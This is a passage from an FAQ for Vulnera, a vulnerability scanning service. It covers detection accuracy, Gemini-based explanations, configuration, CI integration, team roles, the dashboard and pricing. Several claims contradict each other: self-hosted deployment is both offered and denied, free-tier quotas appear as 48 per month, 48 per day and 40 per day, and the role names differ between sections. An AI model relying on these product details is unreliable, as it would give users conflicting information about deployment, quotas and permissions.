False positive rate: <5% for high-confidence secrets (AWS keys, private certs)

Reference: Secrets Detection

How accurate is SAST analysis?

Detection rates:

VulnerabilityConfidenceFalse Positives
SQL Injection95-98%<3%
Cross-Site Scripting (XSS)93-97%<4%
Command Injection92-95%<5%
Hardcoded Secrets98%+<2%

Limitation: Cannot detect business logic flaws or complex multi-step attacks .

Why didn’t Vulnera detect a vulnerability I know exists?

Possible reasons:

  1. Dynamic code patterns — Code generated at runtime

    • SAST analyzes static AST; runtime patterns require dynamic analysis “next step In roadmap”
  2. Complex data flow — Multi-step taint chains

    • Default taint depth is 3 hops; increase with --taint-depth=5
  3. Custom sanitizers — User-defined security functions not recognized

    • Configure in .vulnera.toml under sast.custom_sanitizers
  4. False negative filtering — Some detections suppressed to reduce noise

    • Enable with --analysis-depth=full

Reference: SAST Analysis


ML vs. LLM

What’s the difference between ML models and LLM features?

AspectML Models (Detection)LLM Features (Explanation)
PurposeFind vulnerabilitiesExplain & fix vulnerabilities
TechnologyPattern matching, AST parsing, entropyGoogle Gemini
Speed<1 second3-10 seconds
Offline✅ Yes❌ No
Cost3 tokens6 tokens
Deterministic✅ Same input = same output❌ May vary slightly

Are ML models proprietary?

Detection models (SAST, Secrets, API) are rule-based and open-source:

  • SAST: tree-sitter AST patterns (GitHub open-source)
  • Secrets: Entropy + regex patterns (public ML fingerprints)
  • API: OpenAPI schema validation (OWASP standards)

LLM explanations use Google Gemini.

Can I use Vulnera without LLM features?

Yes. All detection modules work offline:

vulnera analyze --source . --modules sast,secrets,api,dependencies
# No LLM explanations, but full analysis completed

LLM is optional for:

  • Explanations (vulnera explain-finding <id>)
  • Code fixes (vulnera generate-fix <id>)
  • Natural language queries (vulnera query "How do I...?")

Customization

Can I customize SAST rules?

Yes, three ways:

  1. Update existing rules:

    # .vulnera.toml
    [sast]
    rule_overrides = {
      "SQL_INJECTION" = { severity = "high", enabled = true }
    }
    
  2. Add custom rules:

    # .vulnera/custom_rules.py
    @sast_rule("CUSTOM_XSS")
    def check_unescaped_output(node):
        """Check for unescaped user input in HTML templates"""
        # Custom pattern matching logic
    
  3. Disable noisy rules:

    [sast.disabled_rules]
    "LOW_ENTROPY_STRING" = true
    "COMMENTED_SECRET" = true
    

Reference: SAST Analysis

Can I filter out certain secret types?

Yes:

# .vulnera.toml
[secrets]
ignored_patterns = [
  "GITHUB_TOKEN_PLACEHOLDER",  # Exact string match
  "^test_.*",                   # Regex patterns
]

# Or ignore by file
ignored_files = [
  "docs/examples.md",
  "tests/fixtures/**"
]

Command line:

vulnera analyze . --secrets-ignore-patterns="test_,example_"

Integration

How do I integrate Vulnera into GitHub Actions?

name: Security Scan
on: [push, pull_request]

jobs:
  vulnera:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - uses: vulnera-dev/vulnera-action@v1
        with:
          api-key: ${{ secrets.VULNERA_API_KEY }}
          analysis-depth: standard
          fail-on-severity: high

Reference: DevSecOps Quick Start

Can I scan S3 buckets?

Yes:

vulnera analyze --source s3://my-bucket/project \
  --aws-credentials-from-env

Requirements:

  • AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY environment variables
  • S3 bucket must have read access

Reference: Cloud Engineer Quick Start

Does Vulnera support enterprise deployments?

Yes, three options:

  1. SaaS (api.vulnera.studio) — Fully managed
  2. Self-hosted Docker — On your infrastructure
  3. Kubernetes helm chart — Enterprise clusters

Reference: Architecture - Deployment Models


Performance

How long does analysis take?

Typical times (standard depth):

SourceSizeTime
Small repo (5K LOC)<1 MB2-5 sec
Medium repo (50K LOC)5-10 MB10-30 sec
Large repo (800K LOC)50-100 MB1-5 min

Optimization:

# Faster (minimal depth)
vulnera analyze . --analysis-depth=minimal  # 2-3 sec

# Slower (full depth)
vulnera analyze . --analysis-depth=full     # +2-3x time

Can I parallelize scanning?

Yes:

# Scan 10 repos in parallel
for repo in repo1 repo2 ... repo10; do
  vulnera analyze $repo --source-type=git &
done
wait

Concurrency limits:

  • CLI: Unlimited (your machine)
  • API: 50 concurrent jobs per organization
  • Jobs queued beyond limit; respects rate limit

Organization & Teams

How do I share results with my team?

  1. Create organization:

    vulnera org create "My Team"
    
  2. Invite members:

    vulnera org members add teammate@company.com --role=analyst
    
  3. Run scan under organization:

    vulnera analyze . --org-id=<org-id>
    # Results visible to all org members
    

Reference: DevSecOps Quick Start

What are organization roles?

RolePermissions
OwnerCreate/delete org, manage all settings, view all results
Admin *Invite members, configure scanning policies, view analytics
Analyst *Run scans, view results, generate reports
ViewerView results only, read-only access

Troubleshooting

Vulnera says “API Key not found” but I set VULNERA_API_KEY

Check:

echo $VULNERA_API_KEY  # Verify variable is set
vulnera auth status   # Check authentication

Possible causes:

  • API key is revoked
  • API key doesn’t have required organization access
  • Environment variable not exported (use export VULNERA_API_KEY=...)

Analysis returns empty results but I expect findings

Check:

  1. Verify modules are enabled:

    vulnera analyze . --modules=all --verbose
    # Should list sast, secrets, api, dependencies
    
  2. Lower analysis depth:

    vulnera analyze . --analysis-depth=full  # More aggressive
    
  3. Check file filter:

    vulnera analyze . --include-files="**/*.py,**/*.js"
    

LLM explanations are slow or timing out

Solutions:

  1. Increase timeout: vulnera config set llm.timeout=60
  2. Use organization tier for higher concurrency
  3. Request explanations asynchronously: vulnera explain --async

Dashboard & Web Platform

What is vulnera.studio?

Vulnera Studio (vulnera.studio) is the central web dashboard for managing vulnerability analysis, team collaboration, and security insights. It provides:

  • Personal Dashboard — View your scans and findings
  • Organization Management — Team collaboration with shared quotas
  • API Key Management — Generate keys for CLI and API access
  • Integrations — Connect GitHub, GitLab, Slack, webhooks
  • Analytics & Reporting — Track team metrics and generate compliance reports
  • Billing Management — Upgrade plans and manage subscriptions

Access: Visit https://vulnera.studio and sign in with your email.

Reference: Dashboard Guide

How do I create an organization?

Step-by-step:

  1. Log in to vulnera.studio
  2. Click + New Organization in sidebar
  3. Enter organization name, description, and logo (optional)
  4. Select plan tier (Free, Pro, Enterprise)
  5. Click Create — you’re now the owner

What you get:

  • Shared quota pool (e.g., 48 tokens/month for Free, 1000 for Pro)
  • Team member management (invite/remove members)
  • Centralized reporting and analytics
  • Organization API keys for CI/CD

Reference: Organization Management

How do I invite team members?

Invite members to your organization:

  1. Go to Settings → Members
  2. Click Invite Member
  3. Enter email address(es) and select role:
    • Admin — Manage team, integrations, settings
    • Member — Create scans, resolve findings
    • Viewer — Read-only access (good for executives)
  4. Click Send Invitations
  5. Members receive email with join link

Roles & Permissions:

  • Owner — Full access, billing, delete organization
  • Admin — Members, settings, integrations (no billing)
  • Member — Create/view scans, resolve findings
  • Viewer — Read-only access to scans and reports

Reference: Team Collaboration

How do I generate an API key for the CLI?

Generate API key:

  1. Log in to vulnera.studio
  2. Go to Settings → API Keys
  3. Click Generate New Key
  4. Name the key (e.g., “GitHub Actions”, “Local Dev”)
  5. Set expiration (Never, 30 days, 90 days, 1 year)
  6. Click Create and copy immediately (not shown again)
  7. Store securely in your credential manager or CI/CD secrets

Use in CLI:

vulnera auth login --api-key YOUR_API_KEY

Use in GitHub Actions:

- name: Scan with Vulnera
  env:
    VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
  run: vulnera analyze . --all-modules

Security: Rotate API keys every 90 days. Revoke unused keys immediately.

What’s the difference between personal and organization API keys?

AspectPersonal KeyOrganization Key
Quota40 tokens/day (your own)Shared org quota (48/day for Free, 1000 for Pro)
AccessYour scans onlyAll org members’ scans
TeamIndividualShared across team
Use caseLocal dev, personal projectsCI/CD, team automation
Generated inSettings → API KeysOrganization → Settings → API Keys

Best practice: Use organization keys for CI/CD pipelines; personal keys for local testing.

How do I upgrade my organization’s plan?

Upgrade plan:

  1. Go to vulnera.studioSettings → Billing
  2. Current plan and quota displayed
  3. Click Change Plan or Upgrade
  4. Select new tier (Pro, Enterprise) or add custom tokens
  5. Update payment method if needed
  6. Click Confirm Upgrade

Plan options:

  • Free — 48 tokens/month, 5 members, basic integrations
  • Pro — 1000 tokens/month, unlimited members, advanced integrations
  • Enterprise — Custom tokens, SSO/SAML, custom domains, priority support

Downgrade: Available mid-cycle; changes take effect at next billing date.

Reference: Quota & Pricing

How do I connect GitHub for automatic scanning?

GitHub Integration setup:

  1. Go to vulnera.studioSettings → Integrations → GitHub
  2. Click Connect GitHub
  3. Authorize Vulnera GitHub App (select repos or all repos)
  4. Enable auto-scan triggers:
    • On push to main/develop
    • On all pull requests
    • Scheduled daily scan
  5. Save — scans now run automatically

What happens:

  • PRs show Vulnera status checks
  • Comments added to PRs with findings
  • Merge blocked if critical issues found (configurable)
  • Results uploaded to GitHub code scanning

Reference: Dashboard Guide - GitHub Integration

How do I set up Slack notifications?

Enable Slack integration:

  1. Go to vulnera.studioSettings → Integrations → Slack
  2. Click Connect Slack Workspace
  3. Authorize Vulnera app in Slack
  4. Select notification channel
  5. Configure notification types:
    • Critical findings (immediate)
    • Daily digest
    • Weekly summary
    • Quota alerts
  6. Save

Example Slack message:

🚨 Critical Vulnerability Found
Repo: acme/backend
Finding: SQL Injection in /api/users.py
CVSS: 9.2
→ View Details [Link]

Reference: Dashboard Guide - Slack Integration

How do I view team analytics and usage?

Organization Analytics:

  1. Go to vulnera.studioOrganization → Analytics
  2. View dashboard:
    • Total quota used vs. remaining
    • Per-member breakdown (token consumption)
    • Module usage (pie chart: Dependencies, SAST, Secrets, API)
    • 6-month usage trend
    • Top analyzed projects

Export report:

  1. Click Export
  2. Choose format: CSV, JSON, or PDF
  3. Download for spreadsheets or stakeholder reporting

Reference: Dashboard Guide - Quota Management

Can I generate compliance reports from the dashboard?

Yes, multiple report types:

  1. Go to vulnera.studioReports → Compliance Reports
  2. Select framework:
    • SOC2 Type II
    • ISO 27001
    • GDPR
    • HIPAA (Enterprise)
    • PCI DSS (Enterprise)
  3. Select date range
  4. Click Generate → PDF/HTML download
  5. Share with auditors or stakeholders

Report contents:

  • Security metrics summary
  • Audit log excerpts
  • Member access records
  • Vulnerability remediation status
  • Data handling compliance statements

Reference: Dashboard Guide - Reporting & Export

How do I remove a team member?

Remove member from organization:

  1. Go to vulnera.studioSettings → Members
  2. Find member in list
  3. Click Remove (⋯ menu)
  4. Confirm removal — member loses access immediately

What happens:

  • Member can no longer see organization scans
  • Their scans remain in history (for audit)
  • Their API keys are revoked
  • Activity logged in audit trail

Reinvite later: Can re-invite removed members anytime

Reference: Organization Management - Removing Members


Security & Privacy

Is my code scanned securely?

Data handling:

DataStorageRetention
Code artifactsEncrypted in transit, encrypted at rest30 days (deleted)
FindingsDatabase (encrypted)Until you delete
API keysHashed in databaseUntil revoked
User dataGDPR compliantUntil account deletion

Reference: Architecture - Security Model

Can I see Vulnera’s source code?

Partial:

  • Open-source: SAST rules, Secrets patterns, CLI utilities
  • Proprietary: LLM integration, API backend, rate limiting logic
  • Reference: GitHub open-source modules

Is on-premise deployment available?

NO. Vulnera doesn’t supports self-hosted deployment with plan to support in future.

Contact Vulnera for enterprise licenses.


Cost & Licensing

Is there a free tier?

Yes:

TierFeaturesCost
CommunitySAST, Secrets, API (offline)Free
Developer+Dependency scanning, LLM (limited 40 tokens/day)Free/API key
OrganizationTeam collaboration, 100 tokens/day, analytics$99/month
EnterpriseUnlimited, SLACustom

Reference: Quota & Pricing

What if I exceed my quota?

Billing options:

  1. Auto-upgrade — Automatically upgrade org to higher tier at month-end
  2. Per-use billing — Pay $0.10/token over quota (prepay)
  3. Reserved quota — Pre-purchase token packages at 20% discount

Set preferences in organization settings > Billing.


Getting Help

Resources:

For bugs: GitHub Issues